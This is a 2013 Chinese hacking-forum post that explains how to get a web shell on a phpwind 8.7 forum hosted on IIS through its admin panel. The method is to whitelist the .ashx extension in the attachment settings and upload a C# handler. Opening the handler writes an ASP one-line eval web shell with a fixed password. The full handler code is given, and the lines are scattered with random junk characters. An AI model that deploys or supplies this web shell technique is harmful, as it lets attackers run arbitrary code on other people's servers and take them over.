找回密码
 立即注册
查看: 3007|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小/ M$ c+ |) |1 H8 T  Q
+ s. ]+ K$ l" `0 m2 R8 \- }; _  d
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx4 i! v5 b5 M& Q: f3 a/ d
: z# `' A% Q: N
发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整: h, r" I2 L, G3 l$ ]% H
/ t( l5 M) Z; F0 F
然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx
4 V, y' {  ?3 J9 B: M9 e) M $ Z% L6 B% o9 j6 A1 U+ l
打开之后空白 会在目录底下生成r00ts.asp 密码r00ts+ \9 m4 i- T6 x1 s& ^/ r+ r
# k4 {6 X8 B) r6 {0 K. f0 ]8 V
下面是代码:/ J2 g5 `- q) J

( L0 X8 J3 O9 ]( h) m, z& |<%@ WebHandler Language="C#"Class="Handler" %>
4 }) j1 x9 _* i0 @: Zusing System;
1 p8 ]  x* i5 ~5 G+ Ausing System.Web;
" j9 q7 z% D8 h5 v4 @using System.IO;( Y1 B1 d$ M/ v2 f. a9 y, l7 K5 Y+ w
public class Handler : IHttpHandler {* e- q$ @) ^( u. v
public void ProcessRequest (HttpContext context) {
& a, M+ J3 a1 T4 B3 `( ]2 Acontext.Response.ContentType = "text/plain";
; d  \% S3 \! m! d! O, C% OStreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
# q) T8 v3 c# m1 V3 M7 K, Zfile1.Write("<%eval request(\"r00ts\")%>");
% H* r0 ]( J6 i) x% m  W- P/ M5 Jfile1.Flush();; C0 D4 i* k* U" @  s
file1.Close();9 H: r5 {" _  \: Y3 [; E
}
6 _  j+ [0 n2 Z  E/ x# _public bool IsReusable {, U) K( \8 {( S- L/ J
get {
7 }' H# w: I3 C; l* @; ireturn false;8 Y6 |1 U# }8 J9 K( Z
}
; z' @' o1 h: ]$ }}; m' |3 L" y( Q$ Q1 r  N
}
* U, \# o; w% }4 t  c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表